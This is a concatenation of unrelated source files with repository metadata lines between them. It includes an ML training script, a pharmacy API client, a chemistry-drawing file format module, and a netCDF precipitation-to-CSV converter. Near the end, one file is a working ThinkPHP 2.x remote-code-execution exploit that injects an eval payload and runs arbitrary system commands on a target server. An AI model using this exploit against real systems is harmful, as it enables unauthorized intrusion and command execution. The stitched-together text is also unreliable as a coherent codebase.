# 'SVM-R' exist) — confirm the intended model names
models=['lr','SVM','GBDT','xgboost']
def dataPlot():
    """Plot every feature of the global X against the target Y on a 3-column
    subplot grid, one scatter per feature."""
    feature_count = len(X.columns)
    grid_cols = 3
    grid_rows = math.ceil(feature_count / grid_cols)
    plt.figure(figsize=(10, 12))
    for idx in range(feature_count):
        series = X.iloc[:, idx]
        plt.subplot(grid_rows, grid_cols, idx + 1)
        plt.plot(series, Y, "b+")
        plt.title(label=series.name)
    plt.subplots_adjust(hspace=0.8)
    plt.show()
def featurePlot(feature):
    """Scatter plot of one named feature against the MEDV target."""
    plt.scatter(data[feature],data['MEDV'])
    plt.show()
def preprocessing():
    """Drop outlier rows where MEDV is capped at 50 despite few rooms (RM < 8)."""
    global data
    data = data.drop(data[(data['MEDV']>=50) & (data['RM']<8)].index)
def bestFeatures(num):
    """Return the names of the `num` features most correlated (f_regression)
    with the target Y, after standardising X."""
    scaled = StandardScaler().fit_transform(X)
    selector = SelectKBest(f_regression, k=num).fit(scaled, Y)
    # boolean mask over X's columns marking the selected features
    support_mask = selector.get_support()
    print(support_mask,'\n',X.columns.values)
    chosen = X.columns.values[support_mask]
    print(chosen)
    return chosen
def train(features,models=[]):
    """Train and evaluate each named model on the selected feature columns.

    NOTE(review): `models=[]` is a mutable default (read-only here, but
    fragile); also the target MEDV is continuous while selectModel() builds
    classifiers and performance() prints a classification report — confirm
    that the target is discretised upstream or that regression was intended.
    """
    x_train, x_test, y_train, y_test = train_test_split(X[features], Y, test_size=0.2, random_state=11)
    print(X.shape)
    print(x_train.shape)
    print(x_test.shape)
    # print(house)
    for model in models:
        # classifier = selectModel(modelname=model)
        # classifier.fit(x_train, y_train)
        print(model,'\n')
        predicter = selectModel(model)
        predicter.fit(x_train,y_train)
        preds = predicter.predict(x_test)
        performance(y_test, preds, modelname=model)
def selectModel(modelname):
    """Build and return an untrained sklearn/xgboost classifier by short name.

    Supported names: "lr", "GBDT", "RF", "xgboost", "KNN", "MNB",
    "SVM-P" (polynomial kernel), "SVM-R" (RBF kernel).

    Raises:
        ValueError: for any unknown name. (BUGFIX: previously an unknown
        name — e.g. the 'SVM' entry in the module-level `models` list — fell
        through `else: pass` into `return clf` and crashed with
        UnboundLocalError; now it fails with a clear message.)
    """
    if modelname == "lr":
        from sklearn.linear_model import LogisticRegression
        clf = LogisticRegression()
    elif modelname == "GBDT":
        from sklearn.ensemble import GradientBoostingClassifier
        clf = GradientBoostingClassifier()
    elif modelname == "RF":
        from sklearn.ensemble import RandomForestClassifier
        clf = RandomForestClassifier(n_estimators=100)
    elif modelname == "xgboost":
        from xgboost import XGBClassifier
        clf = XGBClassifier(
            learning_rate=0.01,
            n_estimators=1000,
            max_depth=4,
            min_child_weight=3,
            gamma=0.1,
            subsample=0.8,
            colsample_bytree=0.8,
            reg_alpha=1,
            objective='binary:logistic', #multi:softmax
            nthread=8,
            scale_pos_weight=1,
            seed=27,
            random_state=27
        )
    elif modelname == "KNN":
        from sklearn.neighbors import KNeighborsClassifier as knn
        clf = knn()
    elif modelname == "MNB":
        from sklearn.naive_bayes import MultinomialNB
        clf = MultinomialNB()
    elif modelname == "SVM-P":
        from sklearn.svm import SVC
        clf = SVC(kernel = 'poly', probability = True)
    elif modelname == "SVM-R":
        from sklearn.svm import SVC
        clf = SVC(kernel = 'rbf', probability = True)
    else:
        raise ValueError("unknown model name: %r" % (modelname,))
    return clf
def performance(y_true, y_pred, modelname=""):
    """Print and return the sklearn classification report for one model's
    predictions (per-class precision/recall/F1)."""
    report = classification_report(y_true, y_pred)
    print("模型{}预测结果:\n{}".format(modelname,report))
    return report
if __name__ == "__main__":
    # dataPlot()
    # featurePlot('RM')
    # clean outliers, pick the top features, then train/evaluate every model
    preprocessing()
    # featurePlot('RM')
    best_features = bestFeatures(FEATURE_NUM)
    # BUGFIX: the last line had dataset-metadata junk fused onto it
    # ("... | RootReturn0/ML | ..."), which is a syntax error.
    train(best_features, models)
70312266257 | from typing import Callable, Dict, List, Type
from os import getenv, path
from inspect import signature
import requests
from pydantic import parse_obj_as
from dotenv import load_dotenv
from models import CategoriesResponse, InstructionsResponse, PriceResponse, ProductsResponse, RegionsResponse, SearchResponse
from exceptions import ApiException, HttpCodeException, API_EXCEPTIONS
load_dotenv()
class ZdravcityAPI:
    """
    Thin wrapper around the Zdravcity.ru HTTP API.

    Every call POSTs a JSON payload containing the auth token and parses the
    JSON reply into the corresponding pydantic response model.
    """
    def __init__(self, token: str, test: bool = True):
        self.__token = token
        self.__test = test
        self.__host = getenv("ZDRAVCITY_TEST_HOST") if test else getenv("ZDRAVCITY_HOST")
        self.__headers = {
            'Cookie': 'BITRIX_SM_ABTEST_s1=1%7CB; BITRIX_SM_OLD_FAVORITES_CHECKED=Y; PHPSESSID=2l1jo8ppfpk52b94c6cffkqmd9',
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0",
        }
        if test:
            # the test environment sits behind Cloudflare Access and needs
            # extra credentials from the environment / .env file
            self.__headers.update({
                'CF-Access-Client-Id': getenv('ZDRAVCITY_CF_Access_Client_Id'),
                'CF-Access-Client-Secret': getenv('ZDRAVCITY_CF_Access_Client_Secret'),
                'Authorization': getenv('ZDRAVCITY_Authorization'),
            })

    def __api_method(self, path: str, return_type: Type, params: Dict = {}):
        """POST `params` (plus the token) to `path`; parse as `return_type`.

        Raises:
            HttpCodeException: on a non-2xx HTTP status code.
            ApiException (or a subclass): on a non-zero API `status` field.
        """
        payload = dict(token=self.__token)
        payload.update(params)
        response = requests.post(f"{self.__host}{path}", headers=self.__headers, json=payload)
        # BUGFIX: was `not (200 >= response.status_code < 300)`, which rejected
        # every 2xx code above 200 (201, 204, ...) and accepted 1xx codes.
        if not (200 <= response.status_code < 300):
            raise HttpCodeException(f"Response status code: {response.status_code}")
        json_response = response.json()
        if json_response['status'] != 0:
            for exception in API_EXCEPTIONS:
                if json_response['status'] == exception.STATUS:
                    raise exception
            # unknown non-zero status: fail loudly instead of trying to parse
            raise ApiException(f"Unknown API status: {json_response['status']}")
        return parse_obj_as(return_type, json_response)

    def get_categories(self) -> CategoriesResponse:
        """Fetch the product category tree."""
        return self.__api_method("/api.client/getCategoryList/", CategoriesResponse)

    def get_products(self, start: int=0, count: int=1) -> ProductsResponse:
        """Fetch a page of `count` products starting at offset `start`."""
        return self.__api_method(
            path="/api.client/obtainEsEima/",
            return_type=ProductsResponse,
            params={'start': start, 'count': count}
        )

    def get_regions(self) -> RegionsResponse:
        """Fetch the list of delivery regions."""
        return self.__api_method("/api.client/getRegionList/", RegionsResponse)

    def get_instructions(self, guid: str, start: int=0, count: int=1) -> InstructionsResponse:
        """Fetch a page of medication instructions for the given GUID."""
        return self.__api_method(
            path="/api.client/obtainEsInstructionEima/",
            return_type=InstructionsResponse,
            params={'guidInstruction': guid, 'start': start, 'count': count}
        )

    def get_prices(self, region_code: str, categories: List[str]) -> PriceResponse:
        """Fetch prices and stock levels for active items of the product catalogue."""
        return self.__api_method(
            path="/api.client/getPrices/",
            return_type=PriceResponse,
            params={"region_code": region_code, "show": categories}
        )

    def search_all(self, word: str, where: str = "NAME", region_code: str = "vladimir" ) -> SearchResponse:
        """Full-text product search by `word` in the given field and region."""
        return self.__api_method(
            path="/api.client/getSearchResultAll/",
            return_type=SearchResponse,
            params={"region_code": region_code, "word": word, "where": where}
        )
if __name__ == "__main__":
    # Ad-hoc smoke test: requires ZDRAVCITY_TOKEN (and test-host credentials)
    # in the environment / .env file.
    api = ZdravcityAPI(getenv("ZDRAVCITY_TOKEN"))
    result = api.search_all("аспирин", region_code="vladimir")
    print(result)
    # prices_response = api.get_prices(region_code="vladimir", categories=["igly-i-shpritsy"])
    # length_response = len(prices_response.data.items)
    # print(length_response)
# | KlukvaMors/zdravcity_api | zdravcity.py | zdravcity.py | py | 3,891 | python | en | code | 1 | github-code | 13 |
23162185849 | from app_data import App
from common import float_to_str
from drawing_parents import hex_color, hex_to_color
from molecule import Molecule
from marks import Charge, Electron
from arrow import Arrow
from bracket import Bracket
from text import Text, Plus
import io
import xml.dom.minidom as Dom
# top level object types
# maps a CCDX element tag to the drawing-object class it deserializes into
tagname_to_class = {
    "molecule": Molecule,
    "arrow": Arrow,
    "plus": Plus,
    "text": Text,
    "bracket": Bracket,
}
# obj -> created DOM element (write pass); lets IDManager back-fill ids
obj_element_dict = {}
# (obj, element) pairs whose referenced ids were not yet loaded; retried later
objs_to_read_again = set()
class IDManager:
def __init__(self):
self.clear()
def clear(self):
self.id_to_obj = {}# for read mode
self.obj_to_id = {}# for write mode
self.atom_id_no = 1
self.bond_id_no = 1
self.mark_id_no = 1
self.other_id_no = 1
def addObject(self, obj, obj_id):
self.id_to_obj[obj_id] = obj
def getObject(self, obj_id):
try:
return self.id_to_obj[obj_id]
except KeyError:# object not read yet
return None
def createObjectID(self, obj):
if obj.class_name=="Atom":
new_id = "a%i" % self.atom_id_no
self.atom_id_no += 1
elif obj.class_name=="Bond":
new_id = "b%i" % self.bond_id_no
self.bond_id_no += 1
elif obj.class_name in ("Charge", "Electron"):
new_id = "mk%i" % self.mark_id_no
self.mark_id_no += 1
else:
new_id = "o%i" % self.other_id_no
self.other_id_no += 1
self.obj_to_id[obj] = new_id
# add id attribute if element was already created but id not created
if obj in obj_element_dict:
obj_element_dict[obj].setAttribute("id", new_id)
return new_id
def getID(self, obj):
try:
return self.obj_to_id[obj]
except KeyError:
return self.createObjectID(obj)
def hasObject(self, obj):
return obj in self.obj_to_id
# module-level singleton shared by all read/write helpers below
id_manager = IDManager()
class CcdxFormat:
    """Reader/writer for the native CCDX (XML) document format.

    Reading is iterative: objects whose id references were not yet loaded are
    queued in `objs_to_read_again` and retried until no further progress is
    possible.
    """

    def read(self, filename):
        """Parse `filename` and return the list of top-level drawing objects."""
        doc = Dom.parse(filename)
        return self.readFromDocument(doc)

    def readFromString(self, data):
        # TODO: not implemented yet
        pass

    def readFromDocument(self, doc):
        """Extract all supported top-level objects from a parsed DOM document."""
        ccdxs = doc.getElementsByTagName("ccdx")
        if not ccdxs:
            return []
        root = ccdxs[0]
        # result
        objects = []
        # read objects
        for tagname, ObjClass in tagname_to_class.items():
            elms = root.getElementsByTagName(tagname)
            for elm in elms:
                obj = tagname_to_class[elm.tagName]()
                obj_read_xml_node(obj, elm)
                scale_val = elm.getAttribute("scale_val")
                if scale_val:
                    obj.scale_val = float(scale_val)
                objects.append(obj)
        # some objects failed because dependency objects were not loaded earlier
        while objs_to_read_again:
            successful = False
            for obj, elm in list(objs_to_read_again):
                # BUGFIX: the retry previously looked up the reader via the
                # stale loop variable `tagname` (whatever tag was iterated
                # last above); derive it from the element itself so each
                # queued object is retried with its own reader.
                if globals()[elm.tagName + "_read_xml_node"](obj, elm):
                    objs_to_read_again.remove((obj, elm))
                    successful = True
            if not successful:
                break
        id_manager.clear()
        objs_to_read_again.clear()
        return objects

    def generateString(self, objects):
        """Serialize `objects` to a pretty-printed CCDX XML string."""
        doc = Dom.Document()
        doc.version = "1.0"
        doc.encoding = "UTF-8"
        root = doc.createElement("ccdx")
        doc.appendChild(root)
        for obj in objects:
            elm = obj_create_xml_node(obj, root)
            if obj.scale_val != 1.0:
                elm.setAttribute("scale_val", str(obj.scale_val))
        id_manager.clear()
        obj_element_dict.clear()
        return doc.toprettyxml()

    def write(self, objects, filename):
        """Serialize `objects` and write to `filename`.

        Returns True on success, False on an I/O error (previously a bare
        `except:` that also swallowed programming errors).
        """
        string = self.generateString(objects)
        try:
            with io.open(filename, "w", encoding="utf-8") as out_file:
                out_file.write(string)
            return True
        except OSError:
            return False
def obj_read_xml_node(obj, elm):
    """Dispatch to the `<tag>_read_xml_node` reader for this element, queue
    (obj, elm) for retry on failure, and register the element's id.

    Returns the reader's success flag.
    """
    ok = globals()[elm.tagName+"_read_xml_node"](obj, elm)
    if not ok:
        objs_to_read_again.add((obj, elm))
    uid = elm.getAttribute("id")
    if uid:
        id_manager.addObject(obj, uid)
    return ok
def obj_create_xml_node(obj, parent):
    """Dispatch to the `<type>_create_xml_node` writer for this object and
    remember the created element so a later-assigned id can be patched in."""
    obj_type = obj.class_name.lower()
    elm = globals()[obj_type+"_create_xml_node"](obj, parent)
    obj_element_dict[obj] = elm
    # id already created, need to save id
    if id_manager.hasObject(obj):
        elm.setAttribute("id", id_manager.getID(obj))
    return elm
# ------------- MOLECULE -------------------
def molecule_create_xml_node(molecule, parent):
    """Serialize a molecule (template-atom/bond refs plus all children) as a
    <molecule> child of `parent`; returns the created element."""
    elm = parent.ownerDocument.createElement("molecule")
    if molecule.template_atom:
        elm.setAttribute("template_atom", id_manager.getID(molecule.template_atom))
    if molecule.template_bond:
        elm.setAttribute("template_bond", id_manager.getID(molecule.template_bond))
    for child in molecule.children:
        obj_create_xml_node(child, elm)
    parent.appendChild(elm)
    return elm
def molecule_read_xml_node(molecule, mol_elm):
    """Populate `molecule` from a <molecule> element: name, atoms, bonds and
    template references.

    Returns False when a referenced template atom/bond id is not loaded yet
    (the caller then queues this molecule for a retry pass).
    """
    name = mol_elm.getAttribute("name")
    if name:
        molecule.name = name
    # create atoms
    atom_elms = mol_elm.getElementsByTagName("atom")
    for atom_elm in atom_elms:
        atom = molecule.newAtom()
        obj_read_xml_node(atom, atom_elm)
    # create bonds
    bond_elms = mol_elm.getElementsByTagName("bond")
    for bond_elm in bond_elms:
        bond = molecule.newBond()
        obj_read_xml_node(bond, bond_elm)
    t_atom_id = mol_elm.getAttribute("template_atom")
    if t_atom_id:
        t_atom = id_manager.getObject(t_atom_id)
        if not t_atom:
            return False
        molecule.template_atom = t_atom
    t_bond_id = mol_elm.getAttribute("template_bond")
    if t_bond_id:
        t_bond = id_manager.getObject(t_bond_id)
        if not t_bond:
            return False
        molecule.template_bond = t_bond
    return True
# -------- ATOM -----------
def atom_create_xml_node(atom, parent):
    """Serialize `atom` (and its marks) as an <atom> child of `parent`;
    returns the created element. Only non-default attributes are written."""
    elm = parent.ownerDocument.createElement("atom")
    elm.setAttribute("sym", atom.symbol)
    # atom pos in "x,y" or "x,y,z" format
    pos_attr = float_to_str(atom.x) + "," + float_to_str(atom.y)
    if atom.z != 0:
        pos_attr += "," + float_to_str(atom.z)
    elm.setAttribute("pos", pos_attr)
    if atom.isotope:
        elm.setAttribute("iso", str(atom.isotope))
    # explicit valency
    if not atom.auto_valency:
        # BUGFIX: was `elf.setAttribute(...)` — a NameError whenever an
        # explicit valency had to be written
        elm.setAttribute("val", str(atom.valency))
    # explicit hydrogens. group has always zero hydrogens
    if not atom.is_group and not atom.auto_hydrogens:
        elm.setAttribute("H", str(atom.hydrogens))
    # show/hide symbol if carbon
    if atom.symbol=="C" and atom.show_symbol:
        elm.setAttribute("show_C", "1")
    # text layout
    if not atom.auto_text_layout:
        elm.setAttribute("dir", atom.text_layout)
    # color
    if atom.color != (0,0,0):
        elm.setAttribute("clr", hex_color(atom.color))
    parent.appendChild(elm)
    # add marks
    for child in atom.children:
        obj_create_xml_node(child, elm)
    return elm
def atom_read_xml_node(atom, elm):
    """Populate `atom` from an <atom> element (symbol, position, isotope,
    valency, hydrogens, layout, color) and attach its charge/electron marks.

    Always returns True (atoms have no unresolved id references).
    """
    # read symbol
    symbol = elm.getAttribute("sym")
    if symbol:
        atom.setSymbol(symbol)
    # read postion
    pos = elm.getAttribute("pos")
    if pos:
        pos = list(map(float, pos.split(",")))
        atom.x, atom.y = pos[:2]
        if len(pos)==3:
            atom.z = pos[2]
    # isotope
    isotope = elm.getAttribute("iso")
    if isotope:
        atom.isotope = int(isotope)
    # valency
    valency = elm.getAttribute("val")
    if valency:
        atom.valency = int(valency)
        atom.auto_valency = False
    # hydrogens
    hydrogens = elm.getAttribute("H")
    if hydrogens:
        atom.hydrogens = int(hydrogens)
        atom.auto_hydrogens = False
    # read show carbon
    show_symbol = elm.getAttribute("show_C")
    if show_symbol and atom.symbol=="C":
        atom.show_symbol = bool(int(show_symbol))
    # text layout or direction
    direction = elm.getAttribute("dir")
    if direction:
        atom.text_layout = direction
        atom.auto_text_layout = False
    # color
    color = elm.getAttribute("clr")
    if color:
        atom.color = hex_to_color(color)
    # create marks
    # BUGFIX: the inner loop previously reused the name `elm` for each mark
    # element, clobbering the atom element — the second tag lookup (and the
    # color read above on a retry) then ran on a mark node instead of the
    # atom node, so nested <electron> marks could be missed.
    marks_class_dict = {"charge" : Charge, "electron" : Electron}
    for tagname, MarkClass in marks_class_dict.items():
        mark_elms = elm.getElementsByTagName(tagname)
        for mark_elm in mark_elms:
            mark = MarkClass()
            obj_read_xml_node(mark, mark_elm)
            mark.atom = atom
            atom.marks.append(mark)
    return True
# ----------- end atom --------------------
# -------------- BOND --------------------
# full bond-type name -> short code used in the "typ" XML attribute
short_bond_types = {"normal": "1", "double": "2", "triple": "3",
        "aromatic":"a", "hbond":"h", "partial":"p", "coordinate":"c",
        "wedge":"w", "hatch":"ha", "bold":"b",
}
# short bond type to full bond type map
full_bond_types = {it[1]:it[0] for it in short_bond_types.items()}
def bond_create_xml_node(bond, parent):
    """Serialize *bond* as a <bond> child element of *parent* and return it."""
    node = parent.ownerDocument.createElement("bond")
    node.setAttribute("typ", short_bond_types[bond.type])
    atom_ids = [id_manager.getID(atom) for atom in bond.atoms]
    node.setAttribute("atms", " ".join(atom_ids))
    if not bond.auto_second_line_side:
        node.setAttribute("side", str(bond.second_line_side))
    if bond.color != (0,0,0):  # only store a non-default (black) color
        node.setAttribute("clr", hex_color(bond.color))
    parent.appendChild(node)
    return node
def bond_read_xml_node(bond, elm):
    """Populate *bond* from a ccdx <bond> element.

    Returns False when the two connected atoms can not be resolved,
    True otherwise.
    """
    bond_type = elm.getAttribute("typ")
    if bond_type:
        bond.setType(full_bond_types[bond_type])
    # resolve the two connected atoms from their stored ids
    atom_ids = elm.getAttribute("atms")
    atoms = [id_manager.getObject(uid) for uid in atom_ids.split()] if atom_ids else []
    if len(atoms) < 2 or None in atoms:
        return False  # failed to get both atoms from their ids
    bond.connectAtoms(atoms[0], atoms[1])
    side = elm.getAttribute("side")
    if side:
        bond.second_line_side = int(side)
        bond.auto_second_line_side = False
    color = elm.getAttribute("clr")
    if color:
        bond.color = hex_to_color(color)
    return True
# -------------------- end of bond ----------------------
# -------------------- Marks ----------------------------
def mark_add_attributes_to_xml_node(mark, elm):
    """Store the attributes shared by all marks (relative pos, size) on *elm*."""
    rel_pos = "%s,%s" % (float_to_str(mark.rel_x), float_to_str(mark.rel_y))
    elm.setAttribute("rel_pos", rel_pos)
    elm.setAttribute("size", float_to_str(mark.size))
def mark_read_xml_node(mark, elm):
    """Read the attributes shared by all marks (relative pos, size) from *elm*."""
    rel_pos = elm.getAttribute("rel_pos")
    if rel_pos:
        x_str, y_str = rel_pos.split(",")
        mark.rel_x, mark.rel_y = float(x_str), float(y_str)
    size = elm.getAttribute("size")
    if size:
        mark.size = float(size)
# charge drawing style -> short code used in ccdx files
short_charge_types = { "normal": "n", "circled": "c", "partial": "p" }
# reverse map : short code -> full charge type
full_charge_types = {code: name for name, code in short_charge_types.items()}
def charge_create_xml_node(charge, parent):
    """Serialize *charge* as a <charge> child element of *parent* and return it."""
    node = parent.ownerDocument.createElement("charge")
    mark_add_attributes_to_xml_node(charge, node)  # common mark attributes
    node.setAttribute("typ", short_charge_types[charge.type])
    node.setAttribute("val", str(charge.value))
    parent.appendChild(node)
    return node
def charge_read_xml_node(charge, elm):
    """Populate *charge* from a ccdx <charge> element."""
    mark_read_xml_node(charge, elm)  # common mark attributes
    charge_type = elm.getAttribute("typ")
    if charge_type:
        charge.type = full_charge_types[charge_type]
    value = elm.getAttribute("val")
    if value:
        charge.value = int(value)
    return True
def electron_create_xml_node(electron, parent):
    """Serialize *electron* as an <electron> child element of *parent* and return it."""
    node = parent.ownerDocument.createElement("electron")
    mark_add_attributes_to_xml_node(electron, node)  # common mark attributes
    node.setAttribute("typ", electron.type)
    node.setAttribute("rad", float_to_str(electron.radius))
    parent.appendChild(node)
    return node
def electron_read_xml_node(electron, elm):
    """Populate *electron* from a ccdx <electron> element."""
    mark_read_xml_node(electron, elm)  # common mark attributes
    electron_type = elm.getAttribute("typ")
    if electron_type:
        electron.type = electron_type
    radius = elm.getAttribute("rad")
    if radius:
        electron.radius = float(radius)
    return True
# ----------------- end marks -----------------------
# ------------------ ARROW ---------------------------
# arrow type -> short code used in ccdx files
short_arrow_types = { "normal": "n", "equilibrium": "eq", "retrosynthetic": "rt",
        "resonance": "rn", "electron_shift": "el", "fishhook": "fh",
}
# reverse map : short code -> full arrow type
full_arrow_types = {code: name for name, code in short_arrow_types.items()}
def arrow_create_xml_node(arrow, parent):
    """Serialize *arrow* as an <arrow> child element of *parent* and return it."""
    node = parent.ownerDocument.createElement("arrow")
    node.setAttribute("typ", short_arrow_types[arrow.type])
    pts = " ".join("%s,%s" % (float_to_str(pt[0]), float_to_str(pt[1]))
                   for pt in arrow.points)
    node.setAttribute("pts", pts)
    if arrow.color != (0,0,0):  # only store a non-default (black) color
        node.setAttribute("clr", hex_color(arrow.color))
    if arrow.anchor:
        node.setAttribute("anchor", id_manager.getID(arrow.anchor))
    # TODO : add head dimensions here. because, arrow may be scaled
    parent.appendChild(node)
    return node
def arrow_read_xml_node(arrow, elm):
    """Populate *arrow* from a ccdx <arrow> element.

    Returns False when the point list is malformed or the anchor id can not
    be resolved, True otherwise.
    """
    arrow_type = elm.getAttribute("typ")
    if arrow_type:
        arrow.setType(full_arrow_types[arrow_type])
    points = elm.getAttribute("pts")
    if points:
        # points are stored as space separated "x,y" pairs
        try:
            pt_list = [pt.split(",") for pt in points.split(" ")]
            arrow.points = [(float(pt[0]), float(pt[1])) for pt in pt_list]
        except (ValueError, IndexError):
            # was a bare `except:` which also hid programming errors;
            # only malformed point data should make parsing fail
            return False
    # color
    color = elm.getAttribute("clr")
    if color:
        arrow.color = hex_to_color(color)
    # anchor (object this arrow is attached to)
    anchor_id = elm.getAttribute("anchor")
    if anchor_id:
        anchor = id_manager.getObject(anchor_id)
        if not anchor:
            return False
        arrow.anchor = anchor
    return True
# --------------- end of arrow ---------------------
# ----------------- PLUS -----------------------
def plus_create_xml_node(plus, parent):
    """Serialize *plus* (the '+' between reactants) as a <plus> child of *parent*."""
    node = parent.ownerDocument.createElement("plus")
    node.setAttribute("pos", "%s,%s" % (float_to_str(plus.x), float_to_str(plus.y)))
    node.setAttribute("size", float_to_str(plus.font_size))
    if plus.color != (0,0,0):  # only store a non-default (black) color
        node.setAttribute("clr", hex_color(plus.color))
    parent.appendChild(node)
    return node
def plus_read_xml_node(plus, elm):
    """Populate *plus* (the '+' between reactants) from a ccdx <plus> element."""
    pos = elm.getAttribute("pos")
    if pos:
        x_str, y_str = pos.split(",")
        plus.x, plus.y = float(x_str), float(y_str)
    font_size = elm.getAttribute("size")
    if font_size:
        plus.font_size = float(font_size)
    color = elm.getAttribute("clr")
    if color:
        plus.color = hex_to_color(color)
    return True
# ------------------- end of plus -----------------------
# ---------------------- TEXT -----------------------
def text_create_xml_node(text, parent):
    """Serialize *text* (a free text item) as a <text> child of *parent*."""
    node = parent.ownerDocument.createElement("text")
    node.setAttribute("pos", "%s,%s" % (float_to_str(text.x), float_to_str(text.y)))
    node.setAttribute("text", text.text)
    node.setAttribute("font", text.font_name)
    node.setAttribute("size", float_to_str(text.font_size))
    if text.color != (0,0,0):  # only store a non-default (black) color
        node.setAttribute("clr", hex_color(text.color))
    parent.appendChild(node)
    return node
def text_read_xml_node(text, elm):
    """Populate *text* (a free text item) from a ccdx <text> element."""
    pos = elm.getAttribute("pos")
    if pos:
        x_str, y_str = pos.split(",")
        text.x, text.y = float(x_str), float(y_str)
    content = elm.getAttribute("text")
    if content:
        text.text = content
    font_name = elm.getAttribute("font")
    if font_name:
        text.font_name = font_name
    font_size = elm.getAttribute("size")
    if font_size:
        text.font_size = float(font_size)
    color = elm.getAttribute("clr")
    if color:
        text.color = hex_to_color(color)
    return True
# ---------------------- end of text ---------------------
# --------------------- BRACKET -------------------
# bracket style -> short code used in ccdx files
short_bracket_types = { "square": "s", "curly": "c", "round": "r" }
# reverse map : short code -> full bracket type
full_bracket_types = {code: name for name, code in short_bracket_types.items()}
def bracket_create_xml_node(bracket, parent):
    """Serialize *bracket* as a <bracket> child element of *parent* and return it."""
    node = parent.ownerDocument.createElement("bracket")
    node.setAttribute("typ", short_bracket_types[bracket.type])
    pts = " ".join("%s,%s" % (float_to_str(pt[0]), float_to_str(pt[1]))
                   for pt in bracket.points)
    node.setAttribute("pts", pts)
    if bracket.color != (0,0,0):  # only store a non-default (black) color
        node.setAttribute("clr", hex_color(bracket.color))
    parent.appendChild(node)
    return node
def bracket_read_xml_node(bracket, elm):
    """Populate *bracket* from a ccdx <bracket> element.

    Malformed point data is ignored (the existing points are kept).
    Returns True.
    """
    bracket_type = elm.getAttribute("typ")  # renamed: 'type' shadowed the builtin
    if bracket_type:
        bracket.type = full_bracket_types[bracket_type]
    points = elm.getAttribute("pts")
    if points:
        # points are stored as space separated "x,y" pairs
        try:
            pt_list = [pt.split(",") for pt in points.split(" ")]
            bracket.points = [(float(pt[0]), float(pt[1])) for pt in pt_list]
        except (ValueError, IndexError):
            # was a bare `except:` which also hid programming errors;
            # only malformed point data is deliberately ignored
            pass
    color = elm.getAttribute("clr")
    if color:
        bracket.color = hex_to_color(color)
    return True
# -------------------------- end of bracket ----------------------
| ksharindam/chemcanvas | chemcanvas/fileformat_ccdx.py | fileformat_ccdx.py | py | 17,214 | python | en | code | 1 | github-code | 13 |
25741745319 | from netCDF4 import Dataset
import numpy as np
from datetime import datetime
import os
import shutil
import csv
def get_min_index(data):
    """Return the index of the first occurrence of the minimum value of *data*.

    Works for plain sequences and numpy (incl. masked) arrays.  Replaces a
    hand-rolled double loop that scanned the data twice to find the same
    first-minimum index.
    """
    return int(np.argmin(data))
def get_all_files(folder):
    """Return the names of the regular files directly inside *folder*."""
    return [name for name in os.listdir(folder)
            if os.path.isfile(os.path.join(folder, name))]
def get_csv_headers(file):
    """Build the CSV header row from the variable metadata of one netCDF file.

    Uses the module-level ``folder`` as the directory containing *file*.
    Returns ["Date", "<long_name> (<units>)", ...] for the six
    precipitation variables.
    """
    nc = Dataset(folder + "/" + file, 'r')
    try:
        headers = ["Date"]
        for name in ("precipitation", "precipitation_cnt",
                     "IRprecipitation", "IRprecipitation_cnt",
                     "HQprecipitation", "HQprecipitation_cnt"):
            var = nc.variables[name]
            headers.append("%s (%s)" % (var.long_name, var.units))
        return headers
    finally:
        nc.close()  # the original leaked the netCDF file handle
def parse_CDF(file, lat_loc, lon_loc):
    """Extract one CSV row for the grid cell nearest (lat_loc, lon_loc).

    Opens ``folder/file``, finds the lat/lon grid indices with the smallest
    squared distance to the requested coordinates, and returns
    [begin_date, precipitation, precipitation_cnt, IRprecipitation,
    IRprecipitation_cnt, HQprecipitation, HQprecipitation_cnt].
    """
    nc = Dataset(folder + "/" + file, 'r')
    try:
        # grid indices closest to the requested coordinates
        lat = nc.variables['lat'][:]
        lon = nc.variables['lon'][:]
        lat_index = get_min_index((lat - lat_loc) ** 2)
        lon_index = get_min_index((lon - lon_loc) ** 2)
        row = [nc.BeginDate]
        for name in ("precipitation", "precipitation_cnt",
                     "IRprecipitation", "IRprecipitation_cnt",
                     "HQprecipitation", "HQprecipitation_cnt"):
            # NOTE: these files index data as (lon, lat)
            row.append(nc.variables[name][lon_index, lat_index])
        return row
    finally:
        nc.close()  # the original leaked the netCDF file handle
#path to the input folder
folder = "input_data/"
files = get_all_files(folder)
#Co-ordinates of the place you wish to extract data of
lat_loc = 23.1
lon_loc = 84.96
name_loc = "Lapung"
#creating a new folder with the location name to write the CSV file
# NOTE(review): the folder is deleted and recreated on every run,
# so previous output for this location is lost.
if os.path.exists(name_loc):
    shutil.rmtree(name_loc)
os.makedirs(name_loc)
# write the CSV header row first
with open(name_loc+'/data.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    data = get_csv_headers(files[0])
    writer.writerow(data)
for file in files:
    # Writing data into CSV file
    # NOTE(review): the file is reopened in append mode for every input
    # file; opening it once outside the loop would be cheaper.
    with open(name_loc+'/data.csv', 'a', newline='') as f:
        writer = csv.writer(f)
        data = parse_CDF(file,lat_loc,lon_loc)
        writer.writerow(data)
print("Done.")
exit() | animeshkuzur/netCDF_to_CSV | convert2.py | convert2.py | py | 2,554 | python | en | code | 3 | github-code | 13 |
33527299426 | """
@Time: 2023/11/1 11:24
@Auth: Y5neKO
@File: Thinkphp2_rce.py
@IDE: PyCharm
"""
import requests
import urllib
from urllib.parse import urljoin
def run(url, cmd):
    """Exploit ThinkPHP 2.x preg_replace /e RCE to execute *cmd* on *url*.

    Returns (True, response_text) on success, (False, error_message)
    otherwise.  The previous bare ``except: return False`` returned a lone
    bool while every other path returned a 2-tuple, breaking callers that
    unpack the result.
    """
    try:
        payload = r'/index.php?s=a/b/c/${@print(eval($_POST[cmd]))}'
        payload = urllib.parse.urljoin(url, payload)
        # the {{{{{ / }}}}} markers delimit the command output in the response
        response = requests.post(payload, data={"cmd": "echo '{{{{{';system('" + str(cmd) + "');echo '}}}}}';"})
        if response.status_code == 200:
            return True, response.text
        else:
            return False, "利用失败"
    except Exception:
        # keep the (success, message) contract consistent for callers
        return False, "利用失败"
| Y5neKO/ClosureVulnScanner | exp/Thinkphp2_rce.py | Thinkphp2_rce.py | py | 584 | python | en | code | 8 | github-code | 13 |
17054086434 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KbdishCommRuleShowInfo(object):
    """Value object for one dish rule display tag (name, value, extra info)."""

    # attribute names handled by the generic (de)serialization helpers below
